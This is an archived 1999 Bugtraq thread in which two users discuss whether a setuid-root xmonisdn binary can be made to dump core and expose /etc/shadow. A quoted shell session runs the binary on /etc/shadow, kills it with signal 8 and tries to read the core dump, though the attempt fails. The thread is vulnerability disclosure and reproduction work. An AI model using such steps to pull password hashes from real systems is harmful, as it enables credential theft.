Bugtraq mailing list archives
Re: xmonisdn (isdn4k-utils/Linux) bug report
From: ronvdaal () SYNTONIC NET (Ron van Daal)
Date: Wed, 20 Oct 1999 14:40:43 +0200
Hi Jan-Hendrik, That's the behaviour I would expect from xmonisdn. A setuid binary shouldn't dump core if it's being executed by a user which doesn't match the ownership of the binary. Therefore I think there are two problems: 1) (small) bug in xmonisdn 2) a bug in my Linux system. The problem appeared on my desktop system (RedHat kernel 2.2.5-15), but I couldn't reproduce it on one of my other Linux systems (using kernels 2.0.36 and 2.2.12-OpenWall). -- Ron van Daal | Syntonic Internet | tel. +31(0)46-4230738 ronvdaal () syntonic net | www.syntonic.net | fax. +31(0)46-4230739 On Wed, 20 Oct 1999, Jan-Hendrik Terstegge wrote:
On Tue, 19 Oct 1999 Ron wrote:While playing with xmonisdn (included in the isdn4k-utils package), I discovered a little bug. I didn't find anything regarding xmonisdn in the Bugtraq archives, so here's a quick post. I'm wondering if other xmonisdn users can reproduce this exploit. (Tested on my workstation, which is running Red Hat Linux 6.0) [... exploit ...]I tried the exploit on my workstations, running SuSE Linux 6.1 and 6.2 but it seems as if it was an only RedHat Linux exploit. This was my try to exploit myself. When I make the 'killall -8 xmonisdn' my xmonisdn dies only with an Floating exception but it doesn't dump a core. ---snip--- [pts/> [pts/0@tatooine] /usr/bin > pwd; ls -al xmonisdn /usr/bin -rwsr-xr-x 1 root root 15340 Jul 23 01:20 xmonisdn [pts/> [pts/0@tatooine] /usr/bin > xmonisdn -file /etc/shadow [1] + Stopped xmonisdn -file /etc/shadow [pts/> [pts/0@tatooine] /usr/bin > bg [1] xmonisdn -file /etc/shadow & [pts/> [pts/0@tatooine] /usr/bin > killall -8 xmonisdn [1] Floating exception xmonisdn -file /etc/shadow [pts/> [pts/0@tatooine] /usr/bin > strings core |less strings: core: File or Directory not found ---snip--- -- Jan-Hendrik Terstegge <sysadmin () tatooine ping de>
Current thread:
- Microsoft Security Bulletin (MS99-044), (continued)
- Microsoft Security Bulletin (MS99-044) Aleph One (Oct 20)
- Re: execve bug linux-2.2.12 Timo Felbinger (Oct 20)
- CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Aleph One (Oct 20)
- Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Richard Trott (Oct 20)
- Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Chad Price (Oct 21)
- Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Gregory A Lundberg (Oct 21)
- Remote DoS in Axent's Raptor 6.0 Mike Frantzen (Oct 20)
- xmonisdn (isdn4k-utils/Linux) bug report Ron van Daal (Oct 18)
- Re: xmonisdn (isdn4k-utils/Linux) bug report Jan-Hendrik Terstegge (Oct 20)
- Last weeks release: whisker (new web scanner) rfp () WIRETRIP NET (Oct 20)
- Re: xmonisdn (isdn4k-utils/Linux) bug report Ron van Daal (Oct 20)
- Checkpoint FireWall-1 V4.0: possible bug in LDAP authentication Olaf Selke (Oct 20)
- DoS in Eicon ISDN Modem is now fixed Aviram Jenik (Oct 20)
- Re: Microsoft Security Bulletin (MS99-043) David Schwartz (Oct 18)